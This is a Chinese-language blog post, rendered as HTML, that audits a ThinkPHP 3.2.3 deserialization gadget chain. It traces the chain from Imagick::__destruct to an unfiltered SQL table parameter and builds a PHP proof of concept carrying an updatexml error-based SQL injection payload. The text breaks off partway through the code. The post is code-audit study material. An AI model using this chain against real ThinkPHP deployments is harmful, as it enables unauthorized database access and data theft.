
<!DOCTYPE html>
<html>
<head>
     

<meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0">
<title>thinkphp3.2.3反序列化初探 | ch1e的随笔</title>
<meta name="author" content="ch1e">
<meta name="copyright" content="ch1e">

<link rel="shortcut icon" href="https://ch1e.cn/img/favicon.ico"> 


    <meta name="keywords" content="web安全,代码审计,反序列化">



     
    <meta name="description" content="前言摆了好几天，好几个人老说我前言说摆烂，确实是在摆烂，前两天浅学了一下thinkphp3，今天来学学thinkphp3反序列化链构造 反序列化链分析首先我们需要通过thinkphp来写一个反序列化的demo 12345678&lt;?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Co">
<meta property="og:type" content="article">
<meta property="og:title" content="thinkphp3.2.3反序列化初探">
<meta property="og:url" content="https://ch1e.cn/2022/05/17/tp3unser/">
<meta property="og:site_name" content="ch1e的随笔">
<meta property="og:description" content="前言摆了好几天，好几个人老说我前言说摆烂，确实是在摆烂，前两天浅学了一下thinkphp3，今天来学学thinkphp3反序列化链构造 反序列化链分析首先我们需要通过thinkphp来写一个反序列化的demo 12345678&lt;?phpnamespace Home\Controller;use Think\Controller;class IndexController extends Co">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://q4.qlogo.cn/headimg_dl?dst_uin=1444440144&spec=100">
<meta property="article:published_time" content="2022-05-17T13:54:43.011Z">
<meta property="article:modified_time" content="2022-05-18T10:13:02.741Z">
<meta property="article:author" content="ch1e">
<meta property="article:tag" content="web安全">
<meta property="article:tag" content="代码审计">
<meta property="article:tag" content="反序列化">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://q4.qlogo.cn/headimg_dl?dst_uin=1444440144&spec=100">
 

<meta http-equiv="Cache-Control" content="no-siteapp"/>
<link href="//cdn.jsdelivr.net" rel="preconnect">
<link href="https://ch1e.cn" rel="prefetch">
<link href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css " rel="stylesheet">
<link href="/css/main.css " rel="stylesheet">
<script src="/js/utlis.js"></script>
 
    
 

<meta name="generator" content="Hexo 5.4.0"></head>

<body>
     
    
 
     

<script>
    var $config = {
        tocStyle: "visible",
        CDN:{
            fancyboxJs: "https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.umd.js",
            fancyboxCss: "https://cdn.jsdelivr.net/npm/@fancyapps/ui/dist/fancybox.css"
        },
        
        
    }
</script>
    




  


    <div id="body-wrap">
        <nav id="nav-wrap">
  <div class="navbar">
    <div class="bar">
      <a href="/" class="title">ch1e的随笔</a>

      
      <ul class="menu">
         
        <li><a href="/">首页</a></li>
          
        <li>
          <a class="menu-child-hover" href="javascript:void(0);">找文章</a>
          <ul class="menu-child">
            
            <li><a href='/tags'>标签</a></li>
            
            <li><a href='/archives'>归档</a></li>
            
          </ul>
        </li>
          
        <li><a href="/link">友情链接</a></li>
         
      </ul>
      <i class="fas fa-bars open-nav"></i>
    </div>
  </div>
  <div id="mobile-nav">
    <ul>
       
      <li><a href="/">首页</a></li>
         
      <li><a href='/tags'>标签</a></li>
      
      <li><a href='/archives'>归档</a></li>
         
      <li><a href="/link">友情链接</a></li>
       
    </ul>
  </div>
</nav>


        <main id="main">
            

<article id="post">
  <div class="post-info">
    <div class="post-title">
      <h1>thinkphp3.2.3反序列化初探</h1>
    </div>
    <div class="post-meta">
      <div class="post-date">
        <i class="far fa-calendar-alt fa-fw post-meta-icon"></i>
        <span class="post-meta-label">
          发表于
            2022-05-17 |
        </span>
        
        <i class="fas fa-history fa-fw post-meta-icon"></i>
        <span class="post-meta-label">
          更新于
            2022-06-22
        </span>
      </div>
      <div class="post-meta-wordcount">
        <i class="far fa-file-word fa-fw post-meta-icon"></i>
        <span class="post-meta-label">总字数:</span>
        <span class="word-count">2.7k | </span>
        <i class="far fa-clock fa-fw post-meta-icon"></i>
        <span class="post-meta-label">阅读时长:</span>
        <span>12分钟</span>
        
      </div>
    </div>
  </div>
  <div class="post-content">
    <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>摆了好几天，好几个人老说我前言说摆烂，确实是在摆烂，前两天浅学了一下thinkphp3，今天来学学thinkphp3反序列化链构造</p>
<h1 id="反序列化链分析"><a href="#反序列化链分析" class="headerlink" title="反序列化链分析"></a>反序列化链分析</h1><p>首先我们需要通过thinkphp来写一个反序列化的demo</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Home</span>\<span class="title">Controller</span>;</span><br><span class="line"><span class="keyword">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">IndexController</span> <span class="keyword">extends</span> <span class="title">Controller</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">        <span class="variable">$a</span>=unserialize(base64_decode(I(<span class="string">&#x27;post.data&#x27;</span>)));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>php的反序列化和java不同，php的反序列化起点大部分是那俩魔术方法__wakeup和__destruct,因此我们寻找反序列化链就需要去搜寻这种魔术方法,其实有个小技巧，就是在找反序列化起点的类的时候，尽可能去找可控变量多的类，因为可控变量多才能让我们控制程序的可能更大。</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220517215939001.png" alt="image-20220517215939001"></p>
<p>这里我们找到Think\Image\Driver\Imagick这个类，他这里的img属性可控</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;img) || <span class="keyword">$this</span>-&gt;img-&gt;destroy();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里判断了img是否为空并且调用了他的destory方法，注意这里的destroy方法是没有参数的，但是我们如果需要构造反序列化链，必须找到同名方法，所以继续去搜索destory方法，但是我们只能找到三个有一个参数的destory的方法，这里的话就有条件了，<strong>在ThinkPHP框架中，调用一个有参函数却不传入参数，这在PHP5中可以这么执行，但在PHP7中却会异常抛出，因此要复现的话不能用PHP7的环境。</strong>所以我们这里选择的是php5版本的，继续看代码，他调用了自身的handler属性的delete方法，但是这里的话只有this-&gt;sessionName可控，sessID因为是需要在上面__destruct方法中传入，但是他调用的是无参的方法。</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220517225006164.png" alt="image-20220517225006164"></p>
<p>继续往下走，寻找delete方法，来到ThinkPHP/Mode/Lite/Model.class.php。$options默认为空数组</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220517231832002.png" alt="image-20220517231832002"></p>
<p>可以看到他如果满足两个if判断的条件就会进入到$this-&gt;delete,但是这次传入的参数是data[$pk],继续往下走，有个问题就是如果where为键的键值对为空，会直接返回false，解决办法也给出来了，就是设置where=1=1</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220517232434092.png" alt="image-20220517232434092"></p>
<p>继续寻找有delete方法的地方，找到ThinkPHP/Library/Think/Db/Driver.class.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 删除记录</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@access</span> public</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> array $options 表达式</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span> false | integer</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">delete</span>(<span class="params"><span class="variable">$options</span>=<span class="keyword">array</span>(<span class="params"></span>)</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">$this</span>-&gt;model  =   <span class="variable">$options</span>[<span class="string">&#x27;model&#x27;</span>];</span><br><span class="line">    <span class="keyword">$this</span>-&gt;parseBind(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;bind&#x27;</span>])?<span class="variable">$options</span>[<span class="string">&#x27;bind&#x27;</span>]:<span class="keyword">array</span>());</span><br><span class="line">    <span class="variable">$table</span>  =   <span class="keyword">$this</span>-&gt;parseTable(<span class="variable">$options</span>[<span class="string">&#x27;table&#x27;</span>]);</span><br><span class="line">    <span class="variable">$sql</span>    =   <span class="string">&#x27;DELETE FROM &#x27;</span>.<span class="variable">$table</span>;</span><br><span class="line">    <span class="keyword">if</span>(strpos(<span class="variable">$table</span>,<span class="string">&#x27;,&#x27;</span>))&#123;<span class="comment">// 多表删除支持USING和JOIN操作</span></span><br><span class="line">        <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;using&#x27;</span>]))&#123;</span><br><span class="line">            <span class="variable">$sql</span> .= <span class="string">&#x27; USING &#x27;</span>.<span class="keyword">$this</span>-&gt;parseTable(<span class="variable">$options</span>[<span class="string">&#x27;using&#x27;</span>]).<span class="string">&#x27; &#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$sql</span> .= <span class="keyword">$this</span>-&gt;parseJoin(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;join&#x27;</span>])?<span class="variable">$options</span>[<span class="string">&#x27;join&#x27;</span>]:<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$sql</span> .= <span class="keyword">$this</span>-&gt;parseWhere(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>])?<span class="variable">$options</span>[<span class="string">&#x27;where&#x27;</span>]:<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(!strpos(<span class="variable">$table</span>,<span class="string">&#x27;,&#x27;</span>))&#123;</span><br><span class="line">        <span class="comment">// 单表删除支持order和limit</span></span><br><span class="line">        <span class="variable">$sql</span> .= <span class="keyword">$this</span>-&gt;parseOrder(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;order&#x27;</span>])?<span class="variable">$options</span>[<span class="string">&#x27;order&#x27;</span>]:<span class="string">&#x27;&#x27;</span>)</span><br><span class="line">        .<span class="keyword">$this</span>-&gt;parseLimit(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;limit&#x27;</span>])?<span class="variable">$options</span>[<span class="string">&#x27;limit&#x27;</span>]:<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="variable">$sql</span> .=   <span class="keyword">$this</span>-&gt;parseComment(!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;comment&#x27;</span>])?<span class="variable">$options</span>[<span class="string">&#x27;comment&#x27;</span>]:<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="keyword">$this</span>-&gt;execute(<span class="variable">$sql</span>,!<span class="keyword">empty</span>(<span class="variable">$options</span>[<span class="string">&#x27;fetch_sql&#x27;</span>]) ? <span class="literal">true</span> : <span class="literal">false</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220517233303882.png" alt="image-20220517233303882"></p>
<p>继续跟进parseTable方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">parseTable</span>(<span class="params"><span class="variable">$tables</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(is_array(<span class="variable">$tables</span>)) &#123;<span class="comment">// 支持别名定义</span></span><br><span class="line">        <span class="variable">$array</span>   =  <span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$tables</span> <span class="keyword">as</span> <span class="variable">$table</span>=&gt;<span class="variable">$alias</span>)&#123;</span><br><span class="line">            <span class="keyword">if</span>(!is_numeric(<span class="variable">$table</span>))</span><br><span class="line">                <span class="variable">$array</span>[] =  <span class="keyword">$this</span>-&gt;parseKey(<span class="variable">$table</span>).<span class="string">&#x27; &#x27;</span>.<span class="keyword">$this</span>-&gt;parseKey(<span class="variable">$alias</span>);</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="variable">$array</span>[] =  <span class="keyword">$this</span>-&gt;parseKey(<span class="variable">$alias</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="variable">$tables</span>  =  <span class="variable">$array</span>;</span><br><span class="line">    &#125;<span class="keyword">elseif</span>(is_string(<span class="variable">$tables</span>))&#123;</span><br><span class="line">        <span class="variable">$tables</span>  =  explode(<span class="string">&#x27;,&#x27;</span>,<span class="variable">$tables</span>);</span><br><span class="line">        array_walk(<span class="variable">$tables</span>, <span class="keyword">array</span>(&amp;<span class="keyword">$this</span>, <span class="string">&#x27;parseKey&#x27;</span>));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> implode(<span class="string">&#x27;,&#x27;</span>,<span class="variable">$tables</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>parseTable方法判断了一下$tables是否是数组，如果是数组，调用parseKey方法对其键和值进行处理，其实是很危险的，因为parseKey没有进行任何过滤</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">parseKey</span>(<span class="params">&amp;<span class="variable">$key</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$key</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>因此这里就可以执行SQL语句，可以产生一个SQL注入了</p>
<h1 id="反序列化链构造"><a href="#反序列化链构造" class="headerlink" title="反序列化链构造"></a>反序列化链构造</h1><p>首先入口点是ThinkPHP/Library/Think/Image/Driver/Imagick.class.php的__destruct方法，因此我们需要精心构造这个类并且序列化这个类来获得一个POC，因为需要调用$this-&gt;img-&gt;destory，所以需要带上img参数，先写出最开始的一步</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Image</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Image</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Imagick</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$img</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>他的下一步是ThinkPHP/Library/Think/Session/Driver/Memcache.class.php的destory方法，这里他是需要通过调用<code>$this-&gt;handle-&gt;delete($this-&gt;sessionName.$sessID);</code>,因此需要把Memcache也写进来，并且带上handle属性</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Image</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Image</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Imagick</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$img</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Session</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Model</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Memcache</span></span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$handle</span> = <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>然后他需要去调用ThinkPHP/Mode/Lite/Model.class.php的delete方法，这里是有参数需要传入的，所以我们得考虑参数的问题，但是之前在分析的时候说了，需要满足两个if条件，此时$options传入空数组即可满足，但是他还需要调用getPk，因此pk属性是必须的，并且会判断data是否为空，为空则不满足，所以data必须并且非空，并且需要data[$pk]不为空和null，到现在为止目前的代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Image</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Image</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Imagick</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$img</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Session</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Model</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Memcache</span></span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$handle</span> = <span class="literal">null</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Db</span>\<span class="title">Driver</span>\<span class="title">Mysql</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Model</span> </span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$data</span>=<span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$pk</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$options</span>=<span class="keyword">array</span>();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>下一步是调用ThinkPHP/Library/Think/Db/Driver.class.php的delete方法，现在就需要我们精心构造我们的$options了，从结尾开始，首先<code>$this-&gt;parseTable($options[&#39;table&#39;]);</code>,他至少需要有一个table为键的键值对，这里的table是拼接sql语句并且执行，所以我们只要拼接恶意的sql语句即可，并且需要在上一步中满足where=1=1。并且这个数组是第二次被处理的，只是<code>ThinkPHP/Mode/Lite/Model.class.php-&gt;data[$pk]</code>，也是<code>ThinkPHP/Mode/Lite/Model.class.php-&gt;data[$this-&gt;pk]</code>,并且在第一次的delete中where对应的值也是空，所以构造恶意的array后，代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Image</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Image</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Imagick</span></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> <span class="variable">$img</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;img=<span class="keyword">new</span> \Think\Session\Driver\Memcache();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>\<span class="title">Session</span>\<span class="title">Driver</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Model</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Memcache</span></span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$handle</span> = <span class="literal">null</span>;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;img=<span class="keyword">new</span> Model();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Think</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Db</span>\<span class="title">Driver</span>\<span class="title">Mysql</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">Model</span> </span>&#123;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$data</span>=<span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$pk</span>;</span><br><span class="line">        <span class="keyword">protected</span> <span class="variable">$options</span>=<span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="function">        </span>&#123;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;options[<span class="string">&#x27;where&#x27;</span>] = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;pk = <span class="string">&#x27;id&#x27;</span>;</span><br><span class="line">            <span class="keyword">$this</span>-&gt;data[<span class="keyword">$this</span>-&gt;pk] = <span class="keyword">array</span>(</span><br><span class="line">                <span class="string">&#x27;where&#x27;</span>=&gt;<span class="string">&#x27;1=1&#x27;</span>,</span><br><span class="line">                <span class="string">&#x27;table&#x27;</span>=&gt;<span class="string">&#x27;mysql.user where 1=updatexml(1,concat(0x7e,user(),0x7e),1)#&#x27;</span></span><br><span class="line"></span><br><span class="line">            );</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">namespace</span> <span class="title">Home</span>\<span class="title">Controller</span>&#123;</span><br><span class="line">    <span class="title">use</span> <span class="title">Think</span>\<span class="title">Controller</span>;</span><br><span class="line">    <span class="class"><span class="keyword">class</span> <span class="title">DemoController</span> <span class="keyword">extends</span> <span class="title">Controller</span> </span>&#123;</span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">index</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line">            <span class="keyword">echo</span> base64_encode(serialize(<span class="keyword">new</span> \Think\Image\Driver\Imagick() ));</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>但是如果拿这个poc去打，会发现有问题</p>
<p><img src="https://ch1e-img.oss-cn-beijing.aliyuncs.com/img/image-20220518000853986.png" alt="image-20220518000853986"></p>
<p>其实这里忽略了一个点，就是在执行sql语句的地方，ThinkPHP/Library/Think/Db/Driver.class.php-&gt;execute,他有这么一行代码<code>$this-&gt;initConnect(true);</code>,他是进行一个初始化数据连接的操作，这里很明显是单数据库，所以要进入connect方法</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * 初始化数据库连接</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@access</span> protected</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@param</span> boolean $master 主服务器</span></span><br><span class="line"><span class="comment"> * <span class="doctag">@return</span> void</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">protected</span> <span class="function"><span class="keyword">function</span> <span class="title">initConnect</span>(<span class="params"><span class="variable">$master</span>=<span class="literal">true</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(!<span class="keyword">empty</span>(<span class="keyword">$this</span>-&gt;config[<span class="string">&#x27;deploy&#x27;</span>]))</span><br><span class="line">        <span class="comment">// 采用分布式数据库</span></span><br><span class="line">        <span class="keyword">$this</span>-&gt;_linkID = <span class="keyword">$this</span>-&gt;multiConnect(<span class="variable">$master</span>);</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="comment">// 默认单数据库</span></span><br><span class="line">        <span class="keyword">if</span> ( !<span class="keyword">$this</span>-&gt;_linkID ) <span class="keyword">$this</span>-&gt;_linkID = <span class="keyword">$this</span>-&gt;connect();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>connect方法如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">connect</span>(<span class="params"><span class="variable">$config</span>=<span class="string">&#x27;&#x27;</span>,<span class="variable">$linkNum</span>=<span class="number">0</span>,<span class="variable">$autoConnection</span>=<span class="literal">false</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> ( !<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;linkID[<span class="variable">$linkNum</span>]) ) &#123;</span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$config</span>))  <span class="variable">$config</span> =   <span class="keyword">$this</span>-&gt;config;</span><br><span class="line">        <span class="keyword">try</span>&#123;</span><br><span class="line">            <span class="keyword">if</span>(<span class="keyword">empty</span>(<span class="variable">$config</span>[<span class="string">&#x27;dsn&#x27;</span>])) &#123;</span><br><span class="line">                <span class="variable">$config</span>[<span 